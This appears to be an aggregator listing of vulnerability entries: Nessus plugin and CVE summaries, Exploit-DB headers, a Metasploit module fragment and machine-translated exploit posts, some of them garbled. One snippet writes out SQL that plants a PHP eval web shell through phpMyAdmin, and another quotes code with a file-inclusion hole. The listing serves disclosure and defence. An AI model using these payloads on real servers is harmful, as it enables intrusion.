Asterisk Manager User Unauthorized Shell Access (AST-2012-004)

According to the version in its SIP banner, the version of Asterisk running on the remote host is potentially affected by a vulnerability that could allow an authenticated, remote attacker to run arbitrary commands with the credentials of the Asterisk server. %NASLMINLEVEL 70300 C Tenable Network...

FreeBSD : asterisk -- multiple vulnerabilities (1c5abbe2-8d7f-11e1-a374-14dae9ebcf89)

Asterisk project reports : Remote Crash Vulnerability in SIP Channel Driver Heap Buffer Overflow in Skinny Channel Driver Asterisk Manager User Unauthorized Shell Access %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The descriptive text and package checks in this plugin were extracted from...

asterisk -- multiple vulnerabilities

Asterisk project reports: Remote Crash Vulnerability in SIP Channel Driver Heap Buffer Overflow in Skinny Channel Driver Asterisk Manager User Unauthorized Shell Access...

Backdoor in Android for No-Permissions Reverse Shell

Backdoor in Android for No-Permissions Reverse Shell Security expert Thomas Cannon working at viaForensics as the Director of R&D has demonstrated a custom-developed app that installs a backdoor in Android smartphones – without requiring any permissions or exploiting any security holes. Thomas...

OpenSSH < 1.2.2 sshd Local TCP Redirection Connection Masking Weakness

According to its banner, the version of OpenSSH running on the remote host allows local users without shell access to redirect TCP connections with the IDENT 'root@localhost'. A local attacker could use this incorrect IDENT to bypass monitoring/logging. C Tenable, Inc. include"compat.inc"; if...

CVE-2010-4965

/etc/rc.d/rc.local on the D-Link DCS-2121 camera with firmware 1.04 configures a hardcoded password of admin for the root account, which makes it easier for remote attackers to obtain shell access by leveraging a running telnetd server...

MyAuth 3 Blind SQL Injection

Exploit Title: MyAuth3 Blind SQL Injection / Root Shell Access 0day exploit Google Dork: allinurl:1881/?console=panel Date: 09/06/2011 Author: Marcio Almeida marcioatalligatorteamdotorg | @marcioalm Version: 3.0 Tested on: Linux EDB-Note: apparently no true exploit is needed to dump system pwd...

MyAuth3 Blind SQL Injection

Exploit for php platform in category web applications Exploit Title: MyAuth3 Blind SQL Injection / Root Shell Access 0day exploit Google Dork: allinurl:1881/?console=panel Date: 09/06/2011 Author: Marcio Almeida marcioatalligatorteamdot org | @marcioalm Version: 3.0 Tested on: Linux EDB-Note:...

WD TV Live Hub Compromised - Multiple Vulnerabilities Found By Dr. Alberto Fontanella

WD TV Live Hub Compromised - Multiple Vulnerabilities Found By Dr. Alberto Fontanella Dr. Alberto Fontanella found on Western Digital WD TV Live Hub appliance with the last firmware installed 2.06.10 and 3 exploits to get admin password, deface appliance and get root shell: Author: Dr. Alberto...

EC-Council Academy Hacked by GaySec (Malaysian hackers)

EC-Council Academy Hacked byGaySec Malaysian hackers EC-Council Academy https://eccouncilacademy.org Hacked by GaySec Malaysian hackers. EC-Council Academy is a separate distinct company with no corporate connection between itself and EC-Council or EC-Council University. Some months before same...

phpmyadmin get shell four ways to summarize and repair-vulnerability warning-the black bar safety net

Method one: CREATE TABLE mysql.study 7on TEXT NOT NULL ; INSERT INTO mysql.study 7on VALUES '? php @eval$POST7on?& gt;'; SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php'; ---- Or more simultaneously executed in the database: mysql create a table named: study, the field for the 7on, the 导出 到...

Hishop 5.4&5.4.1 SQL injection vulnerability in the EXP-bug warning-the black bar safety net

Hishop online store system V5. 4 The official version is that the Maritime network has the property of self-developed WEB-based applications in the B/S architecture of a B2C online store system, mainly for enterprises and large and medium-sized network operators to provide the best protection, to...

High-speed Ankang School Site program v3. 1. 1 cookie injection vulnerability-vulnerability warning-the black bar safety net

PS:seems to be oyaya kernel. Use the system notes: 1. The present program consists of extreme well-being and development,the symbolic charge a little Fee for everyone to use! 2. The present system for sharing procedures,the user the freedom to choose whether to use,in use, any problems and losses...

ecshop the latest version (v272) the local contains to get SHELL-vulnerability warning-the black bar safety net

Looking directly at the code: js/calendar.php $lang = ! empty$GET'lang' ? trim$GET'lang' : ‘EN’;//no filter, obviously contains a vulnerability if ! fileexists‘../languages/’ . $lang . ‘/calendar.php’ $lang = ‘EN’; requiredirnamedirnameFILE . ‘/data/config.php’; header‘Content-type:...

Xitami Web Server 2.5b4 Remote Buffer Overflow (Egghunter)

Exploit for windows platform in category remote exploits Exploit Title: Xitami Web Server 2.5 Remote Buffer Overflow Egghunter Date: June 4, 2011 Author: Glafkos Charalambous Version: 2.5b4 Tested on: Windows XP SP3 En Discovered by: Krystian Kloskowski email protected:/Desktop python xitami.py...

Joomla 1.6.x Administrator PHP Code Execution

Requirements require 'msf/core' Class declaration class Metasploit3 'Joomla 1.6. Administrator PHP Code Execution', 'Description' = %q This module can be used to gain a remote shell to a Joomla! 1.6. install when administrator credentials are known. This is acheived by uploading a malicious...

CVE-2011-1840

The MartiniCreations PassmanLite Password Manager application before 1.48 for Android stores the master password and unspecified other account information in cleartext, which allows local users to obtain sensitive information by leveraging shell access...

Default credentials

The MartiniCreations PassmanLite Password Manager application before 1.48 for Android stores the master password and unspecified other account information in cleartext, which allows local users to obtain sensitive information by leveraging shell access...

CVE-2011-1840

The MartiniCreations PassmanLite Password Manager application before 1.48 for Android stores the master password and unspecified other account information in cleartext, which allows local users to obtain sensitive information by leveraging shell access...

Fedora 15 : asterisk-1.8.3.3-1.fc15 (2011-5835)

The Asterisk Development Team has announced security releases for Asterisk branches 1.4, 1.6.1, 1.6.2, and 1.8. The available security releases are released as versions 1.4.40.1, 1.6.1.25, 1.6.2.17.3, and 1.8.3.3. These releases are available for immediate download at...